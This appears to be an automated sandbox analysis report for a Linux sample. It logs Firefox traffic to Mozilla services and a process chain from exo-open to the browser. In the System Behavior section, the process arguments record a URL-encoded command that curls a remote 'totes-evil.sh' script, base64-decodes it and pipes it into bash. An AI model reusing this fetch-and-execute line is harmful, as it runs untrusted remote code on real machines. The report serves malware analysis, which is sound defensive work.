                                                                                                                              Oct 18, 2022 22:45:08.648575068 CEST1.1.1.1192.168.2.230x8ebfNo error (0)twitter.com104.244.42.193A (IP address)IN (0x0001)false
                                                                                                                              Oct 18, 2022 22:45:08.648575068 CEST1.1.1.1192.168.2.230x8ebfNo error (0)twitter.com104.244.42.129A (IP address)IN (0x0001)false
                                                                                                                              • content-signature-2.cdn.mozilla.net
                                                                                                                              • push.services.mozilla.com
                                                                                                                              • aus5.mozilla.org
                                                                                                                              • incoming.telemetry.mozilla.org
                                                                                                                              • firefox.settings.services.mozilla.com
                                                                                                                              • firefox-settings-attachments.cdn.mozilla.net
                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                              0192.168.2.233868634.160.144.191443
                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                              2022-10-18 20:44:07 UTC0OUTGET /chains/remote-settings.content-signature.mozilla.org-2021-09-19-15-17-11.chain HTTP/1.1
                                                                                                                              Host: content-signature-2.cdn.mozilla.net
                                                                                                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                              Accept: */*
                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Connection: keep-alive
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              If-Modified-Since: Sat, 31 Jul 2021 15:17:12 GMT
                                                                                                                              If-None-Match: "8cfd2c8fe1fb0bc900759661d7a6ee89"
                                                                                                                              2022-10-18 20:44:07 UTC0INHTTP/1.1 304 Not Modified
                                                                                                                              Date: Tue, 18 Oct 2022 20:12:00 GMT
                                                                                                                              Age: 1927
                                                                                                                              ETag: "8cfd2c8fe1fb0bc900759661d7a6ee89"
                                                                                                                              Cache-Control: public,max-age=3600
                                                                                                                              Alt-Svc: clear
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                              1192.168.2.235439435.162.110.205443
                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                              2022-10-18 20:44:26 UTC0OUTGET / HTTP/1.1
                                                                                                                              Host: push.services.mozilla.com
                                                                                                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                              Accept: */*
                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Sec-WebSocket-Version: 13
                                                                                                                              Origin: wss://push.services.mozilla.com/
                                                                                                                              Sec-WebSocket-Protocol: push-notification
                                                                                                                              Sec-WebSocket-Extensions: permessage-deflate
                                                                                                                              Sec-WebSocket-Key: WCCDx3PI+svspMX/uFSUUQ==
                                                                                                                              Connection: keep-alive, Upgrade
                                                                                                                              Sec-Fetch-Dest: websocket
                                                                                                                              Sec-Fetch-Mode: websocket
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              Pragma: no-cache
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Upgrade: websocket


                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                              10192.168.2.235441235.162.110.205443
                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                              2022-10-18 20:45:07 UTC18OUTGET / HTTP/1.1
                                                                                                                              Host: push.services.mozilla.com
                                                                                                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                              Accept: */*
                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Sec-WebSocket-Version: 13
                                                                                                                              Origin: wss://push.services.mozilla.com/
                                                                                                                              Sec-WebSocket-Protocol: push-notification
                                                                                                                              Sec-WebSocket-Extensions: permessage-deflate
                                                                                                                              Sec-WebSocket-Key: e2m9/qpkGSc6I/RXdydcUQ==
                                                                                                                              Connection: keep-alive, Upgrade
                                                                                                                              Sec-Fetch-Dest: websocket
                                                                                                                              Sec-Fetch-Mode: websocket
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              Pragma: no-cache
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Upgrade: websocket


                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                              2192.168.2.235704435.244.181.201443
                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                              2022-10-18 20:44:29 UTC1OUTGET /update/3/GMP/91.0.1/20210816143654/Linux_x86_64-gcc3/null/release-cck-ubuntu/Linux%205.4.0-72-generic%20(GTK%203.24.20%2Clibpulse%2013.99.0)/canonical/1.0/update.xml HTTP/1.1
                                                                                                                              Host: aus5.mozilla.org
                                                                                                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                              Accept: */*
                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              Connection: keep-alive
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              2022-10-18 20:44:29 UTC1INHTTP/1.1 200 OK
                                                                                                                              Server: nginx
                                                                                                                              Date: Tue, 18 Oct 2022 20:44:29 GMT
                                                                                                                              Content-Type: text/xml; charset=utf-8
                                                                                                                              Content-Length: 720
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              Rule-ID: 17581
                                                                                                                              Rule-Data-Version: 14
                                                                                                                              Content-Signature: x5u=https://content-signature-2.cdn.mozilla.net/chains/aus.content-signature.mozilla.org-2022-11-19-18-50-55.chain; p384ecdsa=FUFVAQs6XOQJRytGhKIcEzMvDYVuaiH97Cb2JeotQKhkLVMlI-JlWphQ-QvfmchLY-mpwQaSNfoBweM1TXjxr8-93xz9CSMxHms50Fa28DUYNtQrVymXNBxYGtOWq5CR
                                                                                                                              Strict-Transport-Security: max-age=31536000;
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Content-Security-Policy: default-src 'none'; frame-ancestors 'none'
                                                                                                                              X-Proxy-Cache-Status: MISS
                                                                                                                              Via: 1.1 google
                                                                                                                              Cache-Control: public,max-age=90
                                                                                                                              Alt-Svc: clear
                                                                                                                              Connection: close
                                                                                                                              2022-10-18 20:44:29 UTC2INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 0a 3c 75 70 64 61 74 65 73 3e 0a 20 20 20 20 3c 61 64 64 6f 6e 73 3e 0a 20 20 20 20 20 20 20 20 3c 61 64 64 6f 6e 20 69 64 3d 22 67 6d 70 2d 67 6d 70 6f 70 65 6e 68 32 36 34 22 20 55 52 4c 3d 22 68 74 74 70 3a 2f 2f 63 69 73 63 6f 62 69 6e 61 72 79 2e 6f 70 65 6e 68 32 36 34 2e 6f 72 67 2f 6f 70 65 6e 68 32 36 34 2d 6c 69 6e 75 78 36 34 2d 32 65 31 37 37 34 61 62 36 64 63 36 63 34 33 64 65 62 62 30 62 35 62 36 32 38 62 64 66 31 32 32 61 33 39 31 64 35 32 31 2e 7a 69 70 22 20 68 61 73 68 46 75 6e 63 74 69 6f 6e 3d 22 73 68 61 35 31 32 22 20 68 61 73 68 56 61 6c 75 65 3d 22 39 34 35 33 31 65 32 36 37 33 31 34 64 65 36 36 31 62 32 32 30 35 63 36 30 36 32 38 33 66 62 30 36 36 64 37 38 31 65 35 63
                                                                                                                              Data Ascii: <?xml version="1.0"?><updates> <addons> <addon id="gmp-gmpopenh264" URL="http://ciscobinary.openh264.org/openh264-linux64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip" hashFunction="sha512" hashValue="94531e267314de661b2205c606283fb066d781e5c


                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                              3192.168.2.234338434.120.208.123443
                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                              2022-10-18 20:44:29 UTC3OUTPOST /submit/firefox-desktop/deletion-request/1/b15353ee-6d41-4b99-a1da-728cade21808 HTTP/1.1
                                                                                                                              Host: incoming.telemetry.mozilla.org
                                                                                                                              User-Agent: Glean/39.0.0 (Rust on Linux)
                                                                                                                              Accept: */*
                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              x-client-version: 39.0.0
                                                                                                                              content-type: application/json; charset=utf-8
                                                                                                                              date: Tue, 18 Oct 2022 22:44:26 GMT
                                                                                                                              content-encoding: gzip
                                                                                                                              content-length: 283
                                                                                                                              x-client-type: Glean
                                                                                                                              Connection: keep-alive
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                              Sec-Fetch-Site: none
                                                                                                                              Pragma: no-cache
                                                                                                                              Cache-Control: no-cache
                                                                                                                              2022-10-18 20:44:29 UTC3OUTData Raw: 1f 8b 08 00 00 00 00 00 00 ff 85 90 c1 72 c2 30 0c 44 ff c5 d7 62 46 36 4e 08 f9 86 1e 7b f7 88 58 2e 1e 82 92 da 0e 85 61 f8 f7 3a 19 86 d2 53 8f f6 5b 69 77 75 13 63 e0 4f 1b d8 0f a2 bd 89 44 5f a2 85 95 48 19 63 b6 39 9c 48 b4 42 83 d6 52 81 54 cd 87 d6 ad 31 6f 00 2d 80 58 09 62 f7 af 26 12 a6 81 8b 02 73 71 09 59 dc 57 a2 eb 03 71 7e 9a 66 ea e9 44 39 5e 6d 72 47 bb 9f 42 ef 8a 7e b3 5b c3 7a de e0 43 4c d9 c6 89 ad c3 fc f0 52 12 1a a9 b6 4f 17 1c c7 e7 e0 8c a1 51 b5 32 9b ba 32 05 3a 3a 87 8e ec 69 70 d4 17 3e f1 91 87 6f 7e 01 c8 93 c7 2e 4f 91 e2 1f 3e 24 7b a6 98 c2 92 bf 5a cf bb 30 76 87 90 69 11 97 cf 4b 53 db da 3c 02 b8 90 c6 1e af 2f 33 3b 55 3a a8 07 ee 0e c8 bc 24 88 a5 30 26 5a 1c ca f3 3d f0 74 11 bf 67 99 4b f8 06 14 ec 3c 4a 8d d5
                                                                                                                              Data Ascii: r0DbF6N{X.a:S[iwucOD_Hc9HBRT1o-Xb&sqYWq~fD9^mrGB~[zCLROQ22::ip>o~.O>${Z0viKS</3;U:$0&Z=tgK<J
                                                                                                                              2022-10-18 20:44:30 UTC4INHTTP/1.1 200 OK
                                                                                                                              Server: openresty
                                                                                                                              Date: Tue, 18 Oct 2022 20:44:30 GMT
                                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                                              Content-Length: 0
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              X-Frame-Options: DENY
                                                                                                                              Access-Control-Allow-Methods: GET, POST, PUT, OPTIONS
                                                                                                                              Access-Control-Max-Age: 1728000
                                                                                                                              Access-Control-Allow-Headers: Accept-Encoding,Connection,Content-Encoding,Content-Length,Content-Type,DNT,Date,Sec-Fetch-Dest,Sec-Fetch-Mode,Sec-Fetch-Site,User-Agent,X-Client-Type,X-Client-Version,X-Debug-ID,X-Forwarded-For,X-Pingsender-Version,X-Pipeline-Proxy,X-Source-Tags,X-Telemetry-Agent
                                                                                                                              Via: 1.1 google
                                                                                                                              Alt-Svc: clear
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                              4192.168.2.235440035.162.110.205443
                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                              2022-10-18 20:44:34 UTC4OUTGET / HTTP/1.1
                                                                                                                              Host: push.services.mozilla.com
                                                                                                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                              Accept: */*
                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Sec-WebSocket-Version: 13
                                                                                                                              Origin: wss://push.services.mozilla.com/
                                                                                                                              Sec-WebSocket-Protocol: push-notification
                                                                                                                              Sec-WebSocket-Extensions: permessage-deflate
                                                                                                                              Sec-WebSocket-Key: ZFg30joj6cMDZG/xR0R8eA==
                                                                                                                              Connection: keep-alive, Upgrade
                                                                                                                              Sec-Fetch-Dest: websocket
                                                                                                                              Sec-Fetch-Mode: websocket
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              Pragma: no-cache
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Upgrade: websocket


                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                              5192.168.2.233891018.64.119.32443
                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                              2022-10-18 20:44:35 UTC5OUTGET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1
                                                                                                                              Host: firefox.settings.services.mozilla.com
                                                                                                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                              Accept: application/json
                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Content-Type: application/json
                                                                                                                              Connection: keep-alive
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              If-Modified-Since: Tue, 01 Jun 2021 14:28:23 GMT
                                                                                                                              If-None-Match: "1622557703112"
                                                                                                                              2022-10-18 20:44:35 UTC5INHTTP/1.1 200 OK
                                                                                                                              Content-Type: application/json
                                                                                                                              Content-Length: 329
                                                                                                                              Connection: close
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Access-Control-Expose-Headers: Content-Length, ETag, Retry-After, Cache-Control, Alert, Expires, Pragma, Content-Type, Backoff, Last-Modified
                                                                                                                              Cache-Control: max-age=3600
                                                                                                                              Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
                                                                                                                              Date: Tue, 18 Oct 2022 20:44:35 GMT
                                                                                                                              Expires: Tue, 18 Oct 2022 20:49:01 GMT
                                                                                                                              Last-Modified: Fri, 25 Mar 2022 17:45:46 GMT
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              ETag: "1648230346554"
                                                                                                                              X-Cache: Miss from cloudfront
                                                                                                                              Via: 1.1 f1c3d16033a0215071d66d8a8c247af4.cloudfront.net (CloudFront)
                                                                                                                              X-Amz-Cf-Pop: TXL50-P4
                                                                                                                              X-Amz-Cf-Id: FbtpNRIM2F8BCUfALFxEaIiwyeqrXcROdX0jZPkuOdLzP6MxtudBhw==
                                                                                                                              2022-10-18 20:44:35 UTC6INData Raw: 7b 22 70 65 72 6d 69 73 73 69 6f 6e 73 22 3a 7b 7d 2c 22 64 61 74 61 22 3a 7b 22 61 74 74 61 63 68 6d 65 6e 74 22 3a 7b 22 68 61 73 68 22 3a 22 30 65 63 30 66 31 36 66 39 32 64 38 37 36 61 39 63 31 31 34 30 64 34 63 31 31 65 32 62 33 34 36 61 39 32 39 32 39 38 34 64 39 61 38 35 34 33 36 30 65 35 34 65 39 39 66 64 63 64 39 39 63 63 30 22 2c 22 73 69 7a 65 22 3a 37 35 38 31 2c 22 66 69 6c 65 6e 61 6d 65 22 3a 22 61 73 72 6f 75 74 65 72 2e 66 74 6c 22 2c 22 6c 6f 63 61 74 69 6f 6e 22 3a 22 6d 61 69 6e 2d 77 6f 72 6b 73 70 61 63 65 2f 6d 73 2d 6c 61 6e 67 75 61 67 65 2d 70 61 63 6b 73 2f 34 66 31 62 63 61 61 30 2d 64 64 66 39 2d 34 33 65 66 2d 61 63 61 33 2d 38 33 37 38 63 34 64 30 35 35 38 32 2e 66 74 6c 22 2c 22 6d 69 6d 65 74 79 70 65 22 3a 22 61 70 70 6c
                                                                                                                              Data Ascii: {"permissions":{},"data":{"attachment":{"hash":"0ec0f16f92d876a9c1140d4c11e2b346a9292984d9a854360e54e99fdcd99cc0","size":7581,"filename":"asrouter.ftl","location":"main-workspace/ms-language-packs/4f1bcaa0-ddf9-43ef-aca3-8378c4d05582.ftl","mimetype":"appl


                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                              6192.168.2.233891218.64.119.32443
                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                              2022-10-18 20:44:37 UTC6OUTGET /v1/ HTTP/1.1
                                                                                                                              Host: firefox.settings.services.mozilla.com
                                                                                                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                              Accept: */*
                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Connection: keep-alive
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              2022-10-18 20:44:37 UTC7INHTTP/1.1 200 OK
                                                                                                                              Content-Type: application/json
                                                                                                                              Content-Length: 939
                                                                                                                              Connection: close
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Access-Control-Expose-Headers: Content-Length, Retry-After, Alert, Content-Type, Backoff
                                                                                                                              Cache-Control: max-age=3600
                                                                                                                              Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
                                                                                                                              Date: Tue, 18 Oct 2022 19:49:55 GMT
                                                                                                                              Expires: Tue, 18 Oct 2022 20:08:13 GMT
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              X-Cache: Hit from cloudfront
                                                                                                                              Via: 1.1 bc66fd12bea603144bf0b6c1578cb3e0.cloudfront.net (CloudFront)
                                                                                                                              X-Amz-Cf-Pop: TXL50-P4
                                                                                                                              X-Amz-Cf-Id: eEkqFLOMCyJ11mLLiI0KtDg12oKmH1SxOcVaI3vxccL6imr1Ma-sOw==
                                                                                                                              Age: 3282
                                                                                                                              2022-10-18 20:44:37 UTC7INData Raw: 7b 22 70 72 6f 6a 65 63 74 5f 6e 61 6d 65 22 3a 22 52 65 6d 6f 74 65 20 53 65 74 74 69 6e 67 73 20 50 52 4f 44 22 2c 22 70 72 6f 6a 65 63 74 5f 76 65 72 73 69 6f 6e 22 3a 22 31 34 2e 38 2e 30 22 2c 22 68 74 74 70 5f 61 70 69 5f 76 65 72 73 69 6f 6e 22 3a 22 31 2e 32 32 22 2c 22 70 72 6f 6a 65 63 74 5f 64 6f 63 73 22 3a 22 68 74 74 70 73 3a 2f 2f 72 65 6d 6f 74 65 2d 73 65 74 74 69 6e 67 73 2e 72 65 61 64 74 68 65 64 6f 63 73 2e 69 6f 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2e 73 65 74 74 69 6e 67 73 2e 73 65 72 76 69 63 65 73 2e 6d 6f 7a 69 6c 6c 61 2e 63 6f 6d 2f 76 31 2f 22 2c 22 73 65 74 74 69 6e 67 73 22 3a 7b 22 62 61 74 63 68 5f 6d 61 78 5f 72 65 71 75 65 73 74 73 22 3a 32 35 2c 22 72 65 61 64 6f 6e 6c 79 22 3a 74 72
                                                                                                                              Data Ascii: {"project_name":"Remote Settings PROD","project_version":"14.8.0","http_api_version":"1.22","project_docs":"https://remote-settings.readthedocs.io","url":"https://firefox.settings.services.mozilla.com/v1/","settings":{"batch_max_requests":25,"readonly":tr


                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                              7192.168.2.236009213.225.78.36443
                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                              2022-10-18 20:44:37 UTC8OUTGET /main-workspace/ms-language-packs/4f1bcaa0-ddf9-43ef-aca3-8378c4d05582.ftl HTTP/1.1
                                                                                                                              Host: firefox-settings-attachments.cdn.mozilla.net
                                                                                                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                              Accept: */*
                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Connection: keep-alive
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              2022-10-18 20:44:37 UTC9INHTTP/1.1 200 OK
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Length: 7581
                                                                                                                              Connection: close
                                                                                                                              Last-Modified: Fri, 25 Mar 2022 17:29:17 GMT
                                                                                                                              x-amz-version-id: e7B0bYbdxIH00OBFDtYjUYFukCC5PJRb
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Server: AmazonS3
                                                                                                                              Date: Tue, 18 Oct 2022 20:44:37 GMT
                                                                                                                              ETag: "c460716b62456449360b23cf5663f275"
                                                                                                                              X-Cache: Hit from cloudfront
                                                                                                                              Via: 1.1 96c1c36adc76f99239fd3220e5be7e6a.cloudfront.net (CloudFront)
                                                                                                                              X-Amz-Cf-Pop: FRA2-C2
                                                                                                                              X-Amz-Cf-Id: 42-h9ulbxHOK6RehPJFbJURt7Zpebn8dQxwSPBcz2_hpod_Ctvwn-A==
                                                                                                                              Age: 41452
                                                                                                                              2022-10-18 20:44:37 UTC9INData Raw: 23 20 54 68 69 73 20 53 6f 75 72 63 65 20 43 6f 64 65 20 46 6f 72 6d 20 69 73 20 73 75 62 6a 65 63 74 20 74 6f 20 74 68 65 20 74 65 72 6d 73 20 6f 66 20 74 68 65 20 4d 6f 7a 69 6c 6c 61 20 50 75 62 6c 69 63 0a 23 20 4c 69 63 65 6e 73 65 2c 20 76 2e 20 32 2e 30 2e 20 49 66 20 61 20 63 6f 70 79 20 6f 66 20 74 68 65 20 4d 50 4c 20 77 61 73 20 6e 6f 74 20 64 69 73 74 72 69 62 75 74 65 64 20 77 69 74 68 20 74 68 69 73 0a 23 20 66 69 6c 65 2c 20 59 6f 75 20 63 61 6e 20 6f 62 74 61 69 6e 20 6f 6e 65 20 61 74 20 68 74 74 70 3a 2f 2f 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 4d 50 4c 2f 32 2e 30 2f 2e 0a 0a 23 23 20 54 68 65 73 65 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 75 73 65 64 20 61 73 20 68 65 61 64 69 6e 67 73 20 69 6e 20 74 68 65 20 72 65 63 6f 6d 6d 65 6e 64
                                                                                                                              Data Ascii: # This Source Code Form is subject to the terms of the Mozilla Public# License, v. 2.0. If a copy of the MPL was not distributed with this# file, You can obtain one at http://mozilla.org/MPL/2.0/.## These messages are used as headings in the recommend


                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                              8192.168.2.233891618.64.119.32443
                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                              2022-10-18 20:44:38 UTC17OUTGET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1
                                                                                                                              Host: firefox.settings.services.mozilla.com
                                                                                                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                              Accept: application/json
                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Content-Type: application/json
                                                                                                                              Connection: keep-alive
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              If-Modified-Since: Fri, 25 Mar 2022 17:45:46 GMT
                                                                                                                              If-None-Match: "1648230346554"
                                                                                                                              2022-10-18 20:44:38 UTC17INHTTP/1.1 304 Not Modified
                                                                                                                              Connection: close
                                                                                                                              Date: Tue, 18 Oct 2022 20:44:38 GMT
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Access-Control-Expose-Headers: Content-Length, ETag, Retry-After, Cache-Control, Alert, Expires, Pragma, Content-Type, Backoff, Last-Modified
                                                                                                                              Cache-Control: max-age=3600
                                                                                                                              Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
                                                                                                                              Expires: Tue, 18 Oct 2022 20:49:01 GMT
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              ETag: "1648230346554"
                                                                                                                              X-Cache: Hit from cloudfront
                                                                                                                              Via: 1.1 6d74947505437c57fd215b170c6b3d90.cloudfront.net (CloudFront)
                                                                                                                              X-Amz-Cf-Pop: TXL50-P4
                                                                                                                              X-Amz-Cf-Id: 7zsbhEdpWJvmpo1i6VKkPvObuhIIumXn5K74eiO7O-IRovmfwdGOlw==
                                                                                                                              Age: 340


                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                              9192.168.2.235441035.162.110.205443
                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                              2022-10-18 20:44:46 UTC18OUTGET / HTTP/1.1
                                                                                                                              Host: push.services.mozilla.com
                                                                                                                              User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                              Accept: */*
                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Sec-WebSocket-Version: 13
                                                                                                                              Origin: wss://push.services.mozilla.com/
                                                                                                                              Sec-WebSocket-Protocol: push-notification
                                                                                                                              Sec-WebSocket-Extensions: permessage-deflate
                                                                                                                              Sec-WebSocket-Key: AT/lsOEeG9ZCQRI3v244Rw==
                                                                                                                              Connection: keep-alive, Upgrade
                                                                                                                              Sec-Fetch-Dest: websocket
                                                                                                                              Sec-Fetch-Mode: websocket
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              Pragma: no-cache
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Upgrade: websocket


                                                                                                                              System Behavior

                                                                                                                              Start time:22:43:41
                                                                                                                              Start date:18/10/2022
                                                                                                                              Path:/usr/bin/exo-open
                                                                                                                              Arguments:exo-open http://bash%20-c%20\u201ccurl%20%20https://gist.githubusercontent.com/ForensicITGuy/165c3de5c3f23168517820b12311fd35/raw/c6e44a7e946fba1bb5eaa0d570aeb98727b8cdc8/totes-evil.sh%20%7C%20base64%20-d%20%7C%20bash\u201d
                                                                                                                              File size:27264 bytes
                                                                                                                              MD5 hash:60a307a6a6325e2034eb5cc56bff1abd

                                                                                                                              Start time:22:43:42
                                                                                                                              Start date:18/10/2022
                                                                                                                              Path:/usr/bin/exo-open
                                                                                                                              Arguments:n/a
                                                                                                                              File size:27264 bytes
                                                                                                                              MD5 hash:60a307a6a6325e2034eb5cc56bff1abd

                                                                                                                              Start time:22:43:43
                                                                                                                              Start date:18/10/2022
                                                                                                                              Path:/usr/bin/exo-open
                                                                                                                              Arguments:n/a
                                                                                                                              File size:27264 bytes
                                                                                                                              MD5 hash:60a307a6a6325e2034eb5cc56bff1abd

                                                                                                                              Start time:22:43:43
                                                                                                                              Start date:18/10/2022
                                                                                                                              Path:/usr/lib/x86_64-linux-gnu/xfce4/exo-2/exo-helper-2
                                                                                                                              Arguments:/usr/lib/x86_64-linux-gnu/xfce4/exo-2/exo-helper-2 --launch WebBrowser http://bash%20-c%20\u201ccurl%20%20https://gist.githubusercontent.com/ForensicITGuy/165c3de5c3f23168517820b12311fd35/raw/c6e44a7e946fba1bb5eaa0d570aeb98727b8cdc8/totes-evil.sh%20%7C%20base64%20-d%20%7C%20bash\u201d
                                                                                                                              File size:80256 bytes
                                                                                                                              MD5 hash:ab59c8990baa7254463cdf800a83b9e3

                                                                                                                              Start time:22:43:43
                                                                                                                              Start date:18/10/2022
                                                                                                                              Path:/usr/lib/x86_64-linux-gnu/xfce4/exo-2/exo-helper-2
                                                                                                                              Arguments:n/a
                                                                                                                              File size:80256 bytes
                                                                                                                              MD5 hash:ab59c8990baa7254463cdf800a83b9e3

                                                                                                                              Start time:22:43:43
                                                                                                                              Start date:18/10/2022
                                                                                                                              Path:/usr/bin/sensible-browser
                                                                                                                              Arguments:/usr/bin/sensible-browser http://bash%20-c%20\u201ccurl%20%20https://gist.githubusercontent.com/ForensicITGuy/165c3de5c3f23168517820b12311fd35/raw/c6e44a7e946fba1bb5eaa0d570aeb98727b8cdc8/totes-evil.sh%20%7C%20base64%20-d%20%7C%20bash\u201d
                                                                                                                              File size:129816 bytes
                                                                                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                              Start time:22:43:43
                                                                                                                              Start date:18/10/2022
                                                                                                                              Path:/usr/bin/sensible-browser
                                                                                                                              Arguments:n/a
                                                                                                                              File size:129816 bytes
                                                                                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                              Start time:22:43:43
                                                                                                                              Start date:18/10/2022
                                                                                                                              Path:/usr/bin/which
                                                                                                                              Arguments:which sensible-browser
                                                                                                                              File size:129816 bytes
                                                                                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                              Start time:22:43:43
                                                                                                                              Start date:18/10/2022
                                                                                                                              Path:/usr/bin/x-www-browser
